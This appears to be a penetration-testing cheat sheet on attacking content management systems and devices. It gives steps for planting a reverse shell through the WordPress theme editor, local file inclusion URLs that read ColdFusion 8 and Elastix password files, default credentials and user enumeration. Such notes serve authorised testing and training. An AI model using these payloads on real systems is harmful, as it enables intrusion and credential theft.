# CMS

* Enumerate version and few other details
* Google their vulnerability

## Wordpress

### admin page

```
/wp-admin
/wp-login
```

### Configuration files

```
setup-config.php
wp-config.php
```

### Enumerate users

```
/?author=1, /?author=2,
```

### Uploading shell in WP\_THEME

1. Login into WP\_dashboard and explore the appearance tab.

![](https://3331885100-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MkfTlo0T97eXbWuX_cT%2F-MkhlfUhkAmKvXkyvk4A%2F-MkhmDkCGMVhTws9XyzE%2Fimage.png?alt=media\&token=c7f319c2-b8db-4433-9139-57c20a806d6f)

2\. Now go in **Themes** section under **Appearance** and select **Editor** and there select **twenty fifteen templet** and get into **404.php**

3\. You see a text area for editing templet, inject your malicious php code here to obtain reverse connection of the webserver.

![](https://3331885100-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MkfTlo0T97eXbWuX_cT%2F-MkhlfUhkAmKvXkyvk4A%2F-Mkhn29nkNanhnyXTdGG%2Fimage.png?alt=media\&token=57ec543e-02e5-4f9f-9739-14a33d4beaad)

4\. Update the file and go to following url -\
**<http://192.168.1.101/wordpress/wp-content/themes/twentyfifteen/404.php>**

**5.** you will have your session upon execution of 404.php file. :)

## Drupal

### Droopescan

```
droopescan scan drupal -u http://example.org/ -t 32
```

### Find version

/CHANGELOG.txt

## Adobe Cold Fusion

### Determine version

```
/CFIDE/adminapi/base.cfc?wsdl
```

### Version 8 Vulnerability

* fckeditor
* LFI

  `http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en`

## Elastix

* Google the vulnerabitlities
* default login are `admin:admin` at `/vtigercrm/`
* able to upload shell in profile-photo

### 2.2.0 - 'graph.php' Local File Inclusion &#x20;

`http://server/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action`

Note: Most probably this will be same password for root user too , so you can directly ssh through it

## Joomla

* Admin page - `/administrator`
* Configuration files

  ```
  configuration.php
  diagnostics.php
  joomla.inc.php
  config.inc.php
  ```

## Mambo

#### Config files

```
configuration.php
config.inc.php  
```

## ZyXel

Configuration files

```
/WAN.html (contains PPPoE ISP password) 
/WLAN_General.html and /WLAN.html (contains WEP key) 
/rpDyDNS.html (contains DDNS credentials) 
/Firewall_DefPolicy.html (Firewall) 
/CF_Keyword.html (Content Filter) 
/RemMagWWW.html (Remote MGMT) 
/rpSysAdmin.html (System) 
/LAN_IP.html (LAN) 
/NAT_General.html (NAT) 
/ViewLog.html (Logs) 
/rpFWUpload.html (Tools) 
/DiagGeneral.html (Diagnostic) 
/RemMagSNMP.html (SNMP Passwords) 
/LAN_ClientList.html (Current DHCP Leases) 

# Config Backups
/RestoreCfg.html
/BackupCfg.html 
```